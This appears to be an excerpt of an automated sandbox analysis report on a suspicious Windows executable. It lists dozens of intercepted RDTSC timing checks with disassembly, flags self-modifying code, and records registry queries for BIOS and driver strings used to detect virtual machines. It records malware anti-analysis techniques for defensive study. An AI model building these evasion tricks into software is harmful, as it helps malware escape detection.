                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C563 second address: 105C568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC1E second address: 105CC43 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C14B9223Ch 0x00000008 jmp 00007F6C14B9223Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC43 second address: 105CC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC47 second address: 105CC6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6C14B9224Fh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F6C14B92247h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CDFE second address: 105CE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D2BC second address: 105D2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007F6C14B92236h 0x0000000c jmp 00007F6C14B92248h 0x00000011 popad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F6C14B92241h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E16D second address: 105E17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 jnc 00007F6C1537B646h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E17D second address: 105E185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BF5A second address: 105BF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6C1537B651h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10652FC second address: 1065300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065494 second address: 10654AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B655h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10654AD second address: 10654B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB641D second address: FB6421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F67 second address: 1075F80 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C14B92236h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F6C14B92236h 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B739 second address: 107B73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B73D second address: 107B741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2B3 second address: 107B2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2B9 second address: 107B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2BD second address: 107B2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2C3 second address: 107B2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2C9 second address: 107B2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080342 second address: 108034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085F95 second address: 1085F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E5A8 second address: 108E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950D1 second address: 10950E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B650h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950E5 second address: 10950E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950E9 second address: 109510E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C1537B654h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F6C1537B646h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109510E second address: 1095126 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C14B92242h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095126 second address: 1095144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F6C1537B646h 0x00000009 jng 00007F6C1537B646h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 jmp 00007F6C1537B64Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109555A second address: 109555F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109555F second address: 109556B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C1537B646h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109556B second address: 109556F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109556F second address: 109558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F6C1537B673h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6C1537B64Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095ADE second address: 1095AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AE2 second address: 1095AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AEE second address: 1095AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AF2 second address: 1095B04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F6C1537B646h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A099 second address: 109A0C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B92242h 0x00000013 jmp 00007F6C14B9223Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A0C6 second address: 109A0CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A0CC second address: 109A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6C14B92249h 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F6C14B92249h 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A111 second address: 109A115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A115 second address: 109A129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F6C14B92236h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A129 second address: 109A141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B651h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099BF8 second address: 1099BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099BFC second address: 1099C0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099C0A second address: 1099C3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6C14B9224Bh 0x0000000c jmp 00007F6C14B92245h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C14B92241h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099C3E second address: 1099C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DB9 second address: 1099DC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C580 second address: 109C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C584 second address: 109C58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C58A second address: 109C5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B64Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C5A0 second address: 109C5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5586 second address: 10A558C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A558C second address: 10A559D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6C14B92236h 0x00000009 jp 00007F6C14B92236h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7991 second address: 10B799E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B799E second address: 10B79A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90D8 second address: 10B90EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6C1537B646h 0x0000000a jmp 00007F6C1537B64Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8466 second address: 10C846C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C846C second address: 10C849D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6C1537B650h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F6C1537B658h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C849D second address: 10C84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84B3 second address: 10C84D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C1537B646h 0x00000008 jmp 00007F6C1537B650h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 je 00007F6C1537B64Eh 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84D9 second address: 10C84F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6C14B92245h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84F6 second address: 10C84FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8690 second address: 10C86A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C86A5 second address: 10C86CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6C1537B646h 0x0000000a jmp 00007F6C1537B64Ah 0x0000000f popad 0x00000010 push ecx 0x00000011 jl 00007F6C1537B646h 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F6C1537B648h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C89AB second address: 10C89DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6C14B92236h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F6C14B92236h 0x00000012 jmp 00007F6C14B92247h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C89DB second address: 10C89DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8B30 second address: 10C8B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8E32 second address: 10C8E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F6C1537B646h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FC0 second address: 10C8FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FC4 second address: 10C8FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FCA second address: 10C8FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C14B92241h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FDF second address: 10C8FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FE3 second address: 10C8FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8FF5 second address: 10C901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6C1537B653h 0x0000000b jbe 00007F6C1537B646h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C901C second address: 10C9031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6C14B92238h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007F6C14B9223Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C92F7 second address: 10C9312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B657h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADA0 second address: 10CADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnp 00007F6C14B92236h 0x0000000c popad 0x0000000d jbe 00007F6C14B92254h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADB7 second address: 10CADBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CADBB second address: 10CADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F6C14B92236h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD993 second address: 10CD9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e pushad 0x0000000f jno 00007F6C1537B646h 0x00000015 jmp 00007F6C1537B64Bh 0x0000001a popad 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F6C1537B655h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CDC0D second address: 10CDC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF02A second address: 10CF030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF030 second address: 10CF036 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40284 second address: 4D402B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C1537B658h 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 6F2C23C0h 0x00000017 push edi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D402B1 second address: 4D402B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D402B7 second address: 4D402BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D402F9 second address: 4D402FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D402FD second address: 4D4031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D4031A second address: 4D40320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D40320 second address: 4D40324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D40324 second address: 4D40328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D40328 second address: 4D40357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f pushfd 0x00000010 jmp 00007F6C1537B64Ch 0x00000015 and ecx, 68CFF128h 0x0000001b jmp 00007F6C1537B64Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D40357 second address: 4D40391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B92248h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4D40391 second address: 4D40397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF361E second address: FF3628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6C14B92236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FF384B second address: FF3851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E51DFD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: FE77C3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 106FCEA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
